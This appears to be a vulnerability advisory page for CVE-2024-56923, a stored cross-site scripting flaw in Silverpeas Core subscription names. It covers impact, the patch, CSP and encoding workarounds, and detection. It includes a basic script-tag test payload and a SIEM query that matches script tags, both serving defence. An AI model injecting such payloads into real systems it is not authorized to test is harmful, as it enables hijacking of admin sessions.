CVE-2024-56923
📋 TL;DR
A stored cross-site scripting (XSS) vulnerability in Silverpeas Core allows remote attackers to inject malicious JavaScript into the Name field of subscriptions. When an admin user views the affected subscription, the script executes in their browser context, potentially leading to session hijacking or unauthorized actions. This affects Silverpeas Core versions 6.3.1 through 6.4.1.
💻 Affected Systems
- Silverpeas Core
📦 What is this software?
Silverpeas by Silverpeas
⚠️ Risk & Real-World Impact
Worst Case
Admin session hijacking leading to full system compromise, data theft, or unauthorized administrative actions.
Likely Case
Session hijacking of admin users, data exfiltration, or unauthorized modifications to the Silverpeas platform.
If Mitigated
Limited impact if proper input validation and output encoding are implemented, or if admin users have script blockers.
🎯 Exploit Status
Exploitation requires authenticated access to create/modify subscriptions and relies on admin interaction.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 6.4.2 or later
Vendor Advisory: https://github.com/Mohamed-Saqib-C/CVEs/blob/main/CVE-2024-56923/README.md
Restart Required: Yes
Instructions:
1. Backup your Silverpeas installation and database. 2. Download and install Silverpeas Core version 6.4.2 or later from the official repository. 3. Restart the Silverpeas service. 4. Verify the fix by checking the version and testing subscription functionality.
🔧 Temporary Workarounds
Input Validation Filter
allImplement server-side input validation to sanitize HTML/JavaScript from subscription name fields.
Modify subscription handling code to strip or encode <, >, &, ", ' characters
Content Security Policy
allImplement strict Content Security Policy headers to prevent script execution from untrusted sources.
Add 'Content-Security-Policy: script-src 'self'' to HTTP headers
🧯 If You Can't Patch
- Restrict subscription creation/modification to trusted users only.
- Implement web application firewall (WAF) rules to block XSS payloads in subscription names.
🔍 How to Verify
Check if Vulnerable:
Check if Silverpeas version is between 6.3.1 and 6.4.1 inclusive, and test by creating a subscription with a basic XSS payload like <script>alert('test')</script> in the name field.Check Version:
Check Silverpeas admin interface or configuration files for version information.Verify Fix Applied:
After patching, verify version is 6.4.2 or later and test that XSS payloads in subscription names are properly sanitized or blocked.📡 Detection & Monitoring
Log Indicators:
- Unusual subscription creation/modification events
- HTTP requests containing script tags in subscription parameters
Network Indicators:
- HTTP POST requests to subscription endpoints with JavaScript payloads
SIEM Query:
source="silverpeas" AND (http_method="POST" AND uri_path="/subscription" AND (param_name="name" AND param_value CONTAINS "<script>"))